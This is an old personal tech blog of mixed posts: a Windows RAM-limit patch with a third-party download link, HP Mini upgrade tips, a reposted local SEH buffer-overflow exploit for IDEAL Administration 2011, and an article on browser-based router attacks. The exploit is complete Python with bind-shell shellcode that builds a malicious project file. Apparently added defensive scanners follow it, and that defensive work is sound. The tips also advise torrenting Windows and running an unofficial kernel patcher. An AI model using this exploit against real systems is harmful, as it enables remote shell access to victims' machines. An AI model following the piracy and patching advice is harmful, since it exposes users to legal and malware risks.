Phree Philes
Phreephiles about anything and everything
Friday, November 11, 2011
Friday, September 30, 2011
New Forum Website check it out
This is a new website that y'all should join and help get up and running.
www.eugenikz.info
go and register and help the community!
Tuesday, September 27, 2011
PhreePhiles needs your help.
I am currently taking donations of any amount to help support a program to give kids laptops for their schooling. If you would like to donate, please click on the donate button. The kids and I will be very thankful.
Sunday, July 31, 2011
How to access more than 4GB ram in x32/x86 arch.
Now, most people will try to tell you that this is not possible and that all you can do is enable the /PAE switch in the boot.ini file. This is wrong.
Microsoft's OS does have the capability to overcome this addressing issue, but it is disabled for some odd reason known only to MS. This is done by RAM lock registry keys and some kernel work as well. I'm going to show you a program that takes care of this without modifying any kernel code or messing up your current operating system [it gives you the option to boot the patched kernel in the boot phase, but it's exactly like booting your non-patched OS].
Now all you have to do is download the 4gb-patch from the link at the end of this post.
Run the program as administrator and click check for updates, then click patch x86 ram lock if no updates are available.
Wait for the program to let you know it has finished, then reboot your system.
On the boot screen you will see two options. It's most likely the first choice; it'll say windows 7 ddr [some crap in German]. Press enter on that one.
Now check out your RAM in the Control Panel and in the Task Manager. You can now run up to 64GB of RAM on an x32/x86 arch.
Note: this only works in Windows 7 for some reason.
And it doesn't always work either. I have another machine and it never works, even with another patcher. I'm still working on this, BTW.
download link: http://www.4shared.com/file/ao3tPw_F/4GB-RAMPatch-Multilingual-1272.html
Labels:
/pae,
4gb patch,
4gb ram limit,
how to,
how to run 4gb on windowx xp,
PAE,
windows 7,
x32,
x64,
x86
HP mini Secrets
Today I am going to show you the hidden secrets of the HP Mini 210 and its Intel Atom N450.
The Atom N450 apparently supports hyper-threading and the x64 arch. This is something HP and Microsoft neglect to tell you. HP also doesn't have any support for x64-based Windows on the HP Mini, but today I'm going to show you how to set it up so the basics of your Mini will work.
Hidden things
The Intel Atom cannot support more than 2GB of RAM [I have not tested this out yet but hopefully will soon; I know for a fact 2GB does work, I just upgraded the RAM this morning].
x64-based Windows drivers are not available at all for the HP Mini 210. I have no idea why HP packages this netbook with a 32-bit operating system [Windows 7 Starter].
Hyper-threading: when I first got this netbook, hyper-threading was disabled. I didn't even know it was capable of this, but it is. There's a slight boost but nothing big.
Behind the battery there is a SIM card slot for 3G. I don't know if a 3G modem is embedded inside the chipset, but I do know there's an empty PCIe slot inside the netbook where we can put a modem.
Now, these are not the new netbooks that are advertised as 3G ready. So all in all, if you have bought an HP Mini 210 and you want to upgrade it to make it almost as powerful as a laptop, just follow the instructions:
1. Download an x64 version of Windows 7 [Google "windows 7 x64 torrent"].
2. Set up a virtual hard disk, set how much space you want the new Windows install to have, and format the space as NTFS.
3. Burn the Windows ISO to a DVD [make sure it's bootable]. I recommend googling the phrase "Microsoft usb/DVD creator"; it's a lot easier.
4. Plug in your USB/DVD, then restart and boot from the device. Choose the partition you just created.
5. Now go to the HP website, go to your computer's driver section and download the drivers [you might need to do this from another computer, seeing as you will not have internet drivers yet]. Install them; they worked fine for me.
6. Now press the Windows key and R, type msconfig and go to boot, then click advanced boot options. Enable the CPU check box by clicking it and choose the highest number of CPUs. You just enabled hyper-threading. Click apply and OK, then restart.
You now have your netbook at its full capability. Enjoy. If I need to update this, I will.
Labels:
HP,
hp 210,
hp mini,
hp mini 210,
hp netbook,
hp secrets,
HP-MINI,
netbook
Tuesday, March 29, 2011
IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit
#!/usr/bin/env python
#################################################################
#
# IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Migrate -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
# Notes: Another version, another exploit... come on guys.
#
#################################################################
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
head = ("\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"); # Project Header
buff = ("\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D" + "\x41" * 2432); # XPSP3 EIP Overwrite
nseh = ("\xEB\x06\x90\x90"); # NSEH
retn = ("\x10\x77\xA0\x02"); # P/P/R ULMigrate_us.dll XPSP3
nops = ("\x90" * 16);
foot = ("\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A");
try:
    print "[*] Generating Evil Migrate File..."
    f1 = open("unIDEAL.ipj","w");
    f1.write(head + buff + nseh + retn + nops + sc + foot);
    f1.close();
    print "[*] File created successfully!"
except:
    print "[-] There was a problem writing the file."
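A defender-side check for the kind of file this script writes, added here as an example and not part of the original post or Dr_IDE's code: it scans a migration project file for Computer= values that are oversized or contain non-printable bytes. The 255-byte limit, the name scan_project and both sample inputs are assumptions constructed for illustration.

```python
import sys

FIELD = b"Computer="
# Assumed upper bound for a legitimate computer name; tune to your environment.
MAX_VALUE_LEN = 255

def scan_project(data):
    """Return (line_number, reason) findings for Computer= entries in raw file bytes."""
    findings = []
    for lineno, line in enumerate(data.split(b"\r\n"), start=1):
        if not line.startswith(FIELD):
            continue
        value = line[len(FIELD):]
        if len(value) > MAX_VALUE_LEN:
            findings.append((lineno, "value is %d bytes, limit is %d"
                             % (len(value), MAX_VALUE_LEN)))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((lineno, "value contains non-printable bytes"))
    return findings

# Constructed samples using the section markers visible in the script above.
BENIGN = b"\r\n[Group,Export,Yes]\r\nComputer=WORKSTATION01\r\n[End]\r\n"
SUSPECT = (b"\r\n[Group,Export,Yes]\r\nComputer=" + b"A" * 2432
           + b"\x90" * 8 + b"\r\n[End]\r\n")

if __name__ == "__main__":
    # Scan files named on the command line, or the constructed samples if none.
    if len(sys.argv) > 1:
        inputs = []
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                inputs.append((path, fh.read()))
    else:
        inputs = [("BENIGN", BENIGN), ("SUSPECT", SUSPECT)]
    for name, data in inputs:
        for lineno, reason in scan_project(data):
            print("%s:%d: %s" % (name, lineno, reason))
```

Run it over .ipj files received from outside before they are opened in the Migrate dialog; a hit on either rule is a reason to quarantine the file.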
Saturday, February 19, 2011
How hackers Find You.
Firewall penetration using javascript
Using javascript on a Web site, you can make someone's router port-forward any port back to them. This software forces any port that might normally be restricted to become open to attack, and leaves the door open for hackers. Worse yet, users might not even know it's happening.
Browser protocol confusion
Hackers can fool a browser into thinking it is using the HTTP protocol (normally used for Web browsing) when in fact it's using a different protocol such as FTP or IRC. This in turn confuses the router on a network and forces it to open ports that might normally be restricted.
Businesses should run strict firewalls to prevent this type of attack, with limited outbound connections. Running an end-point based firewall could also prevent this attack.
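The egress restriction recommended above, sketched as an added example that is not from the original article: it checks outbound flow records against an allowlist and flags HTTP request lines sent to the FTP and IRC ports. The allowlist, the record layout, the function names and the sample flows are assumptions constructed for illustration.

```python
import re

# Assumed egress policy: the only destination ports allowed out of the network.
ALLOWED_OUTBOUND_PORTS = {53, 80, 443}
# Well-known ports of the two protocols the article names.
NON_HTTP_SERVICES = {21: "FTP", 6667: "IRC"}
HTTP_REQUEST_LINE = re.compile(
    rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r?$")

def classify(flow):
    """Return the findings for one outbound flow record (a dict)."""
    findings = []
    port = flow["dport"]
    first_line = flow["payload"].split(b"\n", 1)[0]
    if port not in ALLOWED_OUTBOUND_PORTS:
        findings.append("egress-policy: destination port %d is not allowed" % port)
    if port in NON_HTTP_SERVICES and HTTP_REQUEST_LINE.match(first_line):
        findings.append("protocol-confusion: HTTP request sent to %s port %d"
                        % (NON_HTTP_SERVICES[port], port))
    return findings

def audit(flows):
    """Map each flagged source address to its findings."""
    report = {}
    for flow in flows:
        findings = classify(flow)
        if findings:
            report.setdefault(flow["src"], []).extend(findings)
    return report

# Constructed sample records (documentation address ranges), not real traffic.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.10", "dport": 443,
     "payload": b"\x16\x03\x01\x02\x00\x01"},                  # TLS handshake
    {"src": "10.0.0.7", "dst": "203.0.113.20", "dport": 6667,
     "payload": b"POST / HTTP/1.1\r\nHost: 203.0.113.20:6667\r\n\r\n"},
    {"src": "10.0.0.8", "dst": "203.0.113.30", "dport": 21,
     "payload": b"USER anonymous\r\n"},                        # genuine FTP
    {"src": "10.0.0.9", "dst": "203.0.113.40", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"},
]

if __name__ == "__main__":
    for src, findings in audit(SAMPLE_FLOWS).items():
        for finding in findings:
            print(src, finding)
```

The second record trips both rules: the port is outside the allowlist, and a browser-style request line is addressed to the IRC port.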
Browser-based geo-location harvesting
A malicious Web site can use a browser to learn some information about a user's network with no authentication required. The browser then sends information to an attacker, who asks Google where the original user lives. Google has this data because they correlate network locations with GPS coordinates, collected during their Street View mapping.
http://www.itbusiness.ca/it/client/en/home/News.asp?id=59914&PageMem=2
